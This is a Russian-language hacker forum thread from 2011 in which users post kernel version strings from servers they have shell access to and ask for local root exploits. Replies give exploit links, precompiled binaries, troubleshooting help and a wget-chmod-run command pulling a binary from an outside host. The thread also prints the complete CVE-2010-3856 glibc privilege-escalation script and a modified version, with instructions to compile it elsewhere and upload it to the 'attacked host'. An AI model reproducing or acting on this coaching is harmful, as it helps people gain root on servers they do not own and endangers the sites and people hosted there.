FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006

А то как увидел что консоль работает, глазам не поверил)

vasykas
07.09.2011, 01:41
А посоветуйте чё нить пожалуйста под
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
А то как увидел что консоль работает, глазам не поверил)


можно эти попробовать

http://securityreason.com/securityalert/8124

http://www.securitylab.ru/poc/extra/275397.php

или здесь поискать

http://www.xakep.ru/local/search/search.asp?text=%FD%EA%F1%EF%EB%EE%E8%F2&p=3

extrimportal
07.09.2011, 10:24
на первый получаю только


[+] mmapping null page
[+] adding jmp to pwnage in null page
[+] opening netgraph socket


на второй вообще тихо. Еще варианты есть?

Vald
10.09.2011, 12:19
Linux 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64

Что для этого выбрать?

KpOT88
10.09.2011, 23:12
Linux web3a 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64

Помогите подобрать под это.

plaeer
12.09.2011, 14:59
Linux *** 2.6.18-92.el5 #1 SMP Tue Jun 10 18:51:06 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux есть что-нибудь?

plaeer
13.09.2011, 00:37
Linux *** 2.6.24-24-generic #1 SMP Tue Jul 7 19:10:36 UTC 2009 x86_64 GNU/Linux

Есть что-нибудь?

Tigger
13.09.2011, 01:23
Linux *** 2.6.24-24-generic #1 SMP Tue Jul 7 19:10:36 UTC 2009 x86_64 GNU/Linux
Есть что-нибудь?


Glibc, sendpage, pipe

Покажи вывод:

ls -la /lib/libc*; ls -la /lib/libpc*; ls -la /lib/libme*; df -h; cat /proc/sys/vm/mmap_min_add


Linux web3a 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64
Помогите подобрать под это.


Наверно, надежда только на Glibc


Linux *** 2.6.18-92.el5 #1 SMP Tue Jun 10 18:51:06 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux есть что-нибудь?


Попробуй что-нибудь из enlightenment'a.

Ну и также sendpage при cat /proc/sys/vm/mmap_min_add = 0

попугай
13.09.2011, 04:17
2.6.24-28-server #1 SMP Sat Oct 16 17:53:34 UTC 2010 i686

Почти все перепробовал - не поддается. Чем еще можно?

Faaax
13.09.2011, 09:05
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

беру этот http://www.exploit-db.com/exploits/10613/

но пишет Permission Denied

подскажите,что ещё можно попробовать?

FQziT
13.09.2011, 09:11
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

беру этот http://www.exploit-db.com/exploits/10613/
но пишет Permission Denied
подскажите,что ещё можно попробовать?


Permission Denied когда компилишь? Или когда запускаешь?

Faaax
13.09.2011, 09:14
Permission Denied когда компилишь? Или когда запускаешь?


когда компилю

FQziT
13.09.2011, 09:16
когда компилю


Ну значит дело не в сплоенте, нет прав на gcc, скомпиль на другом серве и пробуй запускать уже бинарник

winstrool
13.09.2011, 11:08
Linux 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

беру этот http://www.exploit-db.com/exploits/10613/
но пишет Permission Denied
подскажите,что ещё можно попробовать?


вот тебе скомпелированный:

CVE-2010-3081

kernel-2.6.18-164 2010 Local Root Exploit

_http://zalil.ru/31690659

extrimportal
13.09.2011, 20:08
народ подскажите плииииз

Linux host.ru 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686

рутну с меня причитается!

Faaax
13.09.2011, 20:37
попробуй этим

_http://zalil.ru/upload/31693627

Tigger
13.09.2011, 20:41
народ подскажите плииииз
Linux host.ru 2.6.18-164.15.1.el5PAE #1 SMP Wed Mar 17 12:14:29 EDT 2010 i686
рутну с меня
причитается
!


Glibc - https://rdot.org/forum/showthread.php?t=817

full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)

P.S. На счет RDS попутал, он для ядер "2.6.30 - 2.6.36-rc8"


попробуй этим
_http://zalil.ru/upload/31693627


Этот сплоит для 64-битных систем.

Faaax
13.09.2011, 20:52
RDS - http://www.exploit-db.com/exploits/15285/
Glibc
full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)
Этот сплоит для 64-битных систем.


сорри,не тот скинул!

N@b$ter
13.09.2011, 20:52
Linux 2.6.32-33-server #70-Ubuntu SMP Thu Jul 7 22:28:30 UTC 2011 x86_64 есть на это чтонибуть желательно скомпилированное буду примного благодарен

Tigger
13.09.2011, 20:56
Linux 2.6.32-33-server #70-Ubuntu SMP Thu Jul 7 22:28:30 UTC 2011 x86_64 есть на это чтонибуть желательно скомпилированное буду примного благодарен


Очень смешно.

Июль 2011 года =\

Только если Glibc, скидывай результат выполнения команды:

ls -la /lib/libc*; ls -la /lib/libpc*; ls -la /lib/libme*; df -h

extrimportal
13.09.2011, 21:33
Glibc - https://rdot.org/forum/showthread.php?t=817
full-nelson - http://www.exploit-db.com/exploits/15704/ (http://www.exploit-db.com/exploits/17787/)
P.S. На счет RDS попутал, он для ядер "2.6.30 - 2.6.36-rc8"
Этот сплоит для 64-битных систем.


На глибц получаю делетед на $ ls -l /proc/$$/fd/3

при компиляции нельсона


$ gcc half-nelson.c -o half-nelson -lrt 2>&1
half-nelson.c: In function 'get_kstack':
half-nelson.c:212: error: 'MAP_32BIT' undeclared (first use in this function)
half-nelson.c:212: error: (Each undeclared identifier is reported only once
half-nelson.c:212: error: for each function it appears in.)
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always true due to limited range of data type
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always false due to limited range of data type
half-nelson.c:231: error: unknown register name 'r8' in 'asm'
half-nelson.c: In function 'do_child_upper':
half-nelson.c:475: warning: integer constant is too large for 'long' type

В чем проблема подскажите пожалуйста.

А также очень интересует

FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006

Netgraph советовали, дохнет.

Tigger
13.09.2011, 23:48
На глибц получаю делетед на $ ls -l /proc/$$/fd/3
при компиляции нельсона

$ gcc half-nelson.c -o half-nelson -lrt 2>&1
half-nelson.c: In function 'get_kstack':
half-nelson.c:212: error: 'MAP_32BIT' undeclared (first use in this function)
half-nelson.c:212: error: (Each undeclared identifier is reported only once
half-nelson.c:212: error: for each function it appears in.)
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always true due to limited range of data type
half-nelson.c:265: warning: integer constant is too large for 'long' type
half-nelson.c:265: warning: comparison is always false due to limited range of data type
half-nelson.c:231: error: unknown register name 'r8' in 'asm'
half-nelson.c: In function 'do_child_upper':
half-nelson.c:475: warning: integer constant is too large for 'long' type

В чем проблема подскажите пожалуйста.
А также очень интересует
FreeBSD 6.0-RELEASE #0: Thu Mar 16 22:40:51 GET 2006
Netgraph советовали, дохнет.


Что? deleted?

Если при выполнение команды:$ ls -l /proc/$$/fd/3

Ты получаешь:

[anything]... /proc/[num]/fd/3 -> /tmp/exploit/target (deleted)

То все нормально, так и должно быть. Попроуй half-helson скомпилировать на другой тачке и full-nelson попробуй, может скомпилируется. (Я тебе дал ссылки на оба сплоита full / half - nelson ).

В каком смысле Нетграф дохнет?

Кроме Нетграфа его врятли что возьмет.

extrimportal
14.09.2011, 13:58
Что? deleted?
Если при выполнение команды:$ ls -l /proc/$$/fd/3
Ты получаешь:
[anything]... /proc/[num]/fd/3 -> /tmp/exploit/target (
deleted
)
То все нормально, так и должно быть. Попроуй half-helson скомпилировать на другой тачке и full-nelson попробуй, может скомпилируется. (Я тебе дал ссылки на оба сплоита full / half - nelson ).
В каком смысле Нетграф дохнет?
Кроме Нетграфа его врятли что возьмет.


на full-nelson получаю:


Failed to open file descriptors.

half-helson скомплил на другой тачке, но не получаю ничего.

в glibc не на второй запрос получаю, а на два запроса

ls -l /proc/$$/fd/3

получаю:


lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)

на Netgraph получаю:

[CODE]
~ FreeBSD

Tigger
14.09.2011, 16:46
в glibc не на второй запрос получаю, а на два запроса
ls -l /proc/$$/fd/3
получаю:

lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)



Я тебе выше же написал, что так и должно быть =)

Делай дальше. У тебя есть хорошие шансы поиметь сервак через Glibc.

[QUOTE="extrimportal"]
на Netgraph получаю:
[CODE]
~ FreeBSD

extrimportal
14.09.2011, 17:20
трудно блин, просто я читал что на первый запрос

ls -l /proc/$$/fd/3

должен получать

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

а получаю

lrwx------ 1 ufre17 ksanln 64 Sep 14 02:40 /proc/14557/fd/3 -> /tmp/eaccelerator.cgi-fcgi14544.sem.GzWKqm (deleted)

и все равно даже если так и задумано то я на

$ ls -l /tmp/exploit

не получаю нифига, а как я понял должен

что то типа

-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

я так понял .с не собрался или что х.з.

жалко блин на серваке 440 сайтов), тоесть в долгу не останусь))

antiaudomain
16.09.2011, 07:08
2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

можете что подсказать под это дело?

vasykas
16.09.2011, 07:27
2.6.18-238.el5 #1 SMP Sun Dec 19 14:22:44 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
можете что подсказать под это дело?


glibs попробуй

http://www.opennet.ru/opennews/art.shtml?num=28338

antiaudomain
16.09.2011, 11:02
glibs попробуй
http://www.opennet.ru/opennews/art.shtml?num=28338


ссылка не создается, когда делаю ln /bin/ping ...

больше нет вариантов?

BLurpi^_^
16.09.2011, 17:36
Linux 2.6.18-238.12.1.el5 есть у кого то?

Kuteke
16.09.2011, 17:45
BLurpi^_^,

не тупи. Полный uname -a покажи!

sevenup
16.09.2011, 17:48
Linux 2.6.18-238.12.1.el5 есть у кого то?


нету, прежде чем спрашивать полистай тему...нету сплойтов под ядра 2011 года

Tigger
16.09.2011, 19:15
ссылка не создается, когда делаю ln /bin/ping ...
больше нет вариантов?


ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;

Скинь результат выполнений этой команды.

Kuteke
16.09.2011, 19:39
нету, прежде чем спрашивать полистай тему...нету сплойтов под ядра 2011 года


Ошибаешся ^_^

sevenup
16.09.2011, 19:49
Ошибаешся ^_^


Ну приведи примеры, раз я ошибаюсь!

antiaudomain
16.09.2011, 21:26
ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
Скинь результат выполнений этой команды.




sh-3.2$ ln /bin/ping /var/tmp/exploit/target
ln: creating hard link `/var/tmp/exploit/target' to `/bin/ping': Invalid cross-device link

sh-3.2$ ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
-rwxr-xr-x 1 root root 1693812 Apr 8 08:44 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 Aug 4 13:25 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root 191708 Apr 8 08:44 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 Aug 4 13:25 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 Aug 4 13:25 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 May 3 16:27 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 Apr 8 08:44 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 Aug 4 13:25 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 May 4 05:38 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 19 Aug 4 13:25 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 16 Mar 10 2011 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 127760 Mar 1 2011 /lib/libpcre.so.0.0.1
ls: /lib/libme*: No such file or directory
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-root
4.8G 3.5G 1.1G 76% /
/dev/sda1 487M 31M 431M 7% /boot
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sda3 487M 54M 409M 12% /tmp
/dev/mapper/VolGroup00-var
387G 316G 56G 86% /var

попугай
17.09.2011, 21:44
ядра 2005ого года чем рутаются?

SpaceMan
18.09.2011, 13:45
есть что нибудь на :

Linux version 2.6.18-194.26.1.el5.028stab081.1 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Dec 23 20:17:23 MSK 2010

sevenup
18.09.2011, 13:56
ядра 2005ого года чем рутаются?


http://www.1337day.com/

ядра начиная с 2001г.

Если не найдёшь, то кидай полную инфу о ядре


есть что нибудь на :
Linux version 2.6.18-194.26.1.el5.028stab081.1 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Dec 23 20:17:23 MSK 2010


Нет.

pinch
18.09.2011, 17:09
есть что нибудь на:

Linux 2.6.35.9 #1 SMP Thu Dec 9 04:26:51 CET 2010 i686

Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:22:04 EDT 2011

extrimportal
19.09.2011, 19:52
подсобите

OS: Linux 2.6.18-194.8.1.el5.028stab070.4 #1 SMP Tue Aug 17 19:11:52 MSD 2010 x86_64

infoseller
19.09.2011, 21:02
Linux server 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:31:24 EDT 2011 x86_64 подскажите что-нибудь, плиз...

Omelly
20.09.2011, 15:43
2 ресурса:


Linux 2.6.32.11-grsec #2 SMP Tue Apr 27 14:53:56 PDT 2010 i686



Darwin 10.8.0 Darwin Kernel Version 10.8.0: Tue Jun 7 16:32:41 PDT 2011; root:xnu-1504.15.3~1/RELEASE_X86_64 x86_64

подскажите пожалуйста что-нить по этим версиям.

попугай
21.09.2011, 17:51
2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686

Можно пробить чем-нибудь, кроме glibс? Для glibс, как я понимаю, нужен gcc, а его нет на сервере.

Tigger
21.09.2011, 18:53
2.6.18-194.11.3.el5PAE #1 SMP Mon Aug 30 17:02:48 EDT 2010 i686
Можно пробить чем-нибудь, кроме glibс? Для glibс, как я понимаю, нужен gcc, а его нет на сервере.


Для Glibc нужен один милипиздришный бинарник, который скомпилируется на любом шелле с Gcc.

попугай
21.09.2011, 19:41
Для Glibc нужен один милипиздришный бинарник, который скомпилируется на любом шелле с Gcc.



Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.

Вот к примеру.


#!/bin/bash

# CVE-2010-3856

# Author: deadbyte



OUTPUT=/etc/ld.so.preload



MASK=`umask`

umask 0

LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null

if [ ! -f $OUTPUT];then

echo"System does not appear to be vulnerable"

exit0

fi

echo -n>$OUTPUT

umask $MASK

cat>exec.c

#include

main(int argc,char*argv[])

{

if(argc==2) {

setgid(0);setuid(0);

system(argv[1]); }

return0;

}

EOF

gcc exec.c-o exec



cat>sh.c

#include

#include

int main()

{

setuid(geteuid());

setgid(getegid());

execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);

return0;

}

EOF

gcc sh.c-o sh



cat>libpwn.c

#include

uid_t getuid(void)

{

chown("$PWD/sh",0,0);

chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _IROTH|S_IXOTH);

return0;

}

EOF

gcc-Wall-fPIC-c libpwn.c

gcc-shared-Wl,-soname,libpwn.so-o libpwn.so libpwn.o



echo"$PWD/libpwn.so">$OUTPUT

ping 2> /dev/null

echo -n>$OUTPUT

./sh



В этом bash-скрипте происходит вызов gcc sh.c -o sh

Tigger
21.09.2011, 20:01
Не понимаю, как Glibc-експлоит можно запустить без gcc? Сам эксплоит основан на компиляции же.
Вот к примеру.

#!/bin/bash

# CVE-2010-3856

# Author: deadbyte



OUTPUT=/etc/ld.so.preload



MASK=`umask`

umask 0

LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null

if [ ! -f $OUTPUT];then

echo"System does not appear to be vulnerable"

exit0

fi

echo -n>$OUTPUT

umask $MASK

cat>exec.c

#include

main(int argc,char*argv[])

{

if(argc==2) {

setgid(0);setuid(0);

system(argv[1]); }

return0;

}

EOF

gcc exec.c-o exec



cat>sh.c

#include

#include

int main()

{

setuid(geteuid());

setgid(getegid());

execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);

return0;

}

EOF

gcc sh.c-o sh



cat>libpwn.c

#include

uid_t getuid(void)

{

chown("$PWD/sh",0,0);

chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _IROTH|S_IXOTH);

return0;

}

EOF

gcc-Wall-fPIC-c libpwn.c

gcc-shared-Wl,-soname,libpwn.so-o libpwn.so libpwn.o



echo"$PWD/libpwn.so">$OUTPUT

ping 2> /dev/null

echo -n>$OUTPUT

./sh



В этом bash-скрипте происходит вызов gcc sh.c -o sh


1. Компилируешь бинарники на другой тачке

2. Меняешь башик примерно таким образом:


#!/bin/bash

# CVE-2010-3856

# Author: deadbyte



OUTPUT=/etc/ld.so.preload



MASK=`umask`

umask 0

LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null

if [ ! -f $OUTPUT];then

echo"System does not appear to be vulnerable"

exit0

fi

echo -n>$OUTPUT

umask $MASK



echo"$PWD/libpwn.so">$OUTPUT

ping 2> /dev/null

echo -n>$OUTPUT

./sh



Т.е. на другой тачке создай 3 файла:

1. exec.c


#include

#include

main(int argc,char*argv[])

{

if(argc==2) {

setgid(0);setuid(0);

system(argv[1]); }

return0;

}



2. sh.c


#include

#include

#include

int main()

{

setuid(geteuid());

setgid(getegid());

execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);

return0;

}



3. libpwn.c


#include

#include

uid_t getuid(void)

{

chown("$PWD/sh",0,0);

chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _ IROTH|S_IXOTH);

return0;

}



Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.

Затем выполни команды:

1. gcc exec.c -o exec

2. gcc sh.c -o sh

3. gcc -Wall -fPIC -c libpwn.c

4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o

И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.

попугай
21.09.2011, 21:17
1. Компилируешь бинарники на другой тачке
2. Меняешь башик примерно таким образом:

#!/bin/bash

# CVE-2010-3856

# Author: deadbyte



OUTPUT=/etc/ld.so.preload



MASK=`umask`

umask 0

LD_AUDIT="libmemusage.so"MEMUSAGE_OUTPUT="$OUTPUT"ping 2> /dev/null

if [ ! -f $OUTPUT];then

echo"System does not appear to be vulnerable"

exit0

fi

echo -n>$OUTPUT

umask $MASK



echo"$PWD/libpwn.so">$OUTPUT

ping 2> /dev/null

echo -n>$OUTPUT

./sh



Т.е. на другой тачке создай 3 файла:
1. exec.c

#include

#include

main(int argc,char*argv[])

{

if(argc==2) {

setgid(0);setuid(0);

system(argv[1]); }

return0;

}



2. sh.c

#include

#include

#include

int main()

{

setuid(geteuid());

setgid(getegid());

execl("/bin/sh","bin/sh","-c","cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;",NULL);

return0;

}



3. libpwn.c

#include

#include

uid_t getuid(void)

{

chown("$PWD/sh",0,0);

chmod("$PWD/sh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S _ IROTH|S_IXOTH);

return0;

}



Вместо $PWD впиши каталог, в котором будешь выполнять все это на атакуемой тачке, к примеру /tmp.
Затем выполни команды:
1. gcc exec.c -o exec
2. gcc sh.c -o sh
3. gcc -Wall -fPIC -c libpwn.c
4. gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
И все файлы, полученные на выходе, залей на атакуемый хост рядом с своим баш скриптиком.



Спасибо, что разжевал все.

Жалко, что

System does not appear to be vulnerable

Запатчено типа?

C-r-A-c-K
22.09.2011, 16:20
знатоки, подскажите пожалуйста сплоит на

FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Mon Jul 12 19:23:19 UTC 2010 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC amd64

shell_c0de
22.09.2011, 17:09
2C-r-A-c-K пробуй http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector %29

C-r-A-c-K
22.09.2011, 17:37
shell_c0de, в консоли (порта 7030) получаю циклический набор символов, в итоге nc вылетает

ginzon
22.09.2011, 18:43
под это есть что>?

Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64

MisterGood
22.09.2011, 18:57
Помогите под этот найти:

Linux 2.6.32-71.29.1.el6.x86_64 #1 SMP Mon Jun 27 19:49:27 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

sevenup
22.09.2011, 19:11
под это есть что>?
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64




wget http://trav1an.t35.com/Localz/Localz-1
chmod +x Localz-1
./Localz-1

wkar
22.09.2011, 21:09
Подскажите под это что-то

2.6.26-2-amd64 #1 SMP Thu Nov 25 04:30:55 UTC 2010 x86_64

SergioBlog
23.09.2011, 23:10
Посоветуйте плз что-то под это ядро:

Linux version 2.6.9-023stab053.2-enterprise (root@rhel4-32) (gcc version 3.4.5 20051201 (Red Hat 3.4.5-2)) #1 SMP Mon Oct 25 18:37:43 MSD 2010

Distr name:

CentOS release 5.2 (Final)

Kernel \r on an \m

Нашёл Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit, подойдёт?

Kuteke
24.09.2011, 09:16
Linux *** 2.6.30.5-x86-intel #1 SMP Mon Aug 17 17:14:40 CEST 2009 i686 GNU/Linux


$ ls -la /lib/libc*;ls -la /lib/libpc*;ls -la /lib/libme*;df -h;
-rwxr-xr-x 1 root root 1294572 Jan 8 2011 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 Jan 28 2011 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 Oct 28 2010 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 11024 Apr 14 2004 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 Oct 28 2010 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 Jul 26 2008 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 Oct 28 2010 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 Apr 15 2008 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 185816 Jan 8 2011 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 Jan 28 2011 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 Oct 28 2010 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 Oct 13 2008 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 Oct 28 2010 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 Apr 15 2008 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 38296 Jan 8 2011 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 Jan 28 2011 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 Oct 28 2010 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 Apr 15 2008 /lib/libctutils.so.0.0.0
-rw-r--r-- 1 root root 5440 Jan 8 2011 /lib/libpcprofile.so
-rw-r--r-- 1 root root 13692 Jan 8 2011 /lib/libmemusage.so
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 14G 10G 3.1G 77% /
tmpfs 3.0G 0 3.0G 0% /lib/init/rw
/dev/sda1 92M 24M 64M 27% /boot
/dev/sda5 430G 61G 348G 15% /home
/dev/sda6 14G 8.2G 4.9G 63% /var

BigBear
24.09.2011, 21:26
Вот под это кто нить что-нить пробивает ??


OS version: Linux version 2.6.25-NX.18-calcutta (root@sysresccd) (gcc version 4.4.3 (Gentoo 4.4.3-r2 p1.2) ) #1 SMP Tue Feb 22 00:59:06 MSK 2011

C-r-A-c-K
24.09.2011, 23:16
коллеги, будьте любезны, подскажите сплоит под

FreeBSD dsfr17.fornex.org 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Mon Jul 19 02:36:49 UTC 2010 root@xxxx.xxx:/usr/obj/usr/src/sys/GENERIC amd64

MisterGood
25.09.2011, 00:16
Помогите под FreeBSD 6.4 найти, ничего не пробивает

KosoyRoman
25.09.2011, 21:14
Linux ubuntu 2.6.34-xen-fly #1 SMP Mon Jun 6 10:33:10 UTC 2011 x86_64 GNU/Linux

Кто посоветует что ребята?

antiaudomain
26.09.2011, 00:29
Linux vh4 2.6.34-hardened-r6 #2 SMP Tue Dec 21 20:54:19 PST 2010 x86_64

подскажите, люди добрые?

ipetryxa
26.09.2011, 01:20
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Jan 13 00:12:41 UTC 2010 x86_64

Что посоветуете?

sevenup
26.09.2011, 09:05
Linux 2.6.26-2-xen-amd64 #1 SMP Wed Jan 13 00:12:41 UTC 2010 x86_64
Что посоветуете?


Glibc или асидбитчес

ZARO
27.09.2011, 13:34
Linux 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 EDT 2009 i686

Подскажите сплоит плиз

Konqi
27.09.2011, 14:59
Linux vh4 2.6.34-hardened-r6 #2 SMP Tue Dec 21 20:54:19 PST 2010 x86_64
подскажите, люди добрые?


вероятно что rds (http://gonqueror.narod.ru/rds.c) возмет

KpOT88
27.09.2011, 19:58
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64

Подскажите, что можно найти под это

sevenup
28.09.2011, 02:57
Linux 2.6.18-194.3.1.el5 #1 SMP Thu May 13 13:08:30 EDT 2010 x86_64
Подскажите, что можно найти под это


Ac1dB1tCh3z пробьёт

golnzales
30.09.2011, 04:37
Linux 2.6.9-78.0.22.ELsmp #1 SMP Fri Apr 24 12:48:19 EDT 2009 x86_64

Нашел эксп какой-то: http://www.securiteam.com/exploits/5VP0N0UF5U.html, но он не собирается как и написано в камментах к нему. как пробить?

C-r-A-c-K
30.09.2011, 17:32
FreeBSD 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 08:49:13 UTC 2009 i386

что пробьет этого зверька?) подскажите умнейшие)

sevenup
01.10.2011, 00:18
FreeBSD 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 08:49:13 UTC 2009 i386
что пробьет этого зверька?) подскажите умнейшие)


http://www.exploit-db.com/exploits/10255/

Komyak
01.10.2011, 12:06
Linux 2.6.18-238.19.1.el5PAE #1 SMP Fri Jul 15 12:17:47 EDT 2011 i686


Можно ли повысить привелегии?

Expl0ited
01.10.2011, 12:32
Можно ли повысить привелегии?


Нет.

.while
01.10.2011, 17:45
Linux 2.6.18-194.17.4.el5 #1 SMP Mon Oct 25 15:50:53 EDT 2010 x86_64

можно что-нибудь придумать?

Expl0ited
01.10.2011, 19:25
Тема закрыта в связи с малой информативностью в задаваемых вопросах. Новая тема находится здесь (https://antichat.live/threads/296327/) .

ВНИМАТЕЛЬНО ЧИТАЙТЕ ПРАВИЛА ОФОРМЛЕНИЯ СООБЩЕНИЯ!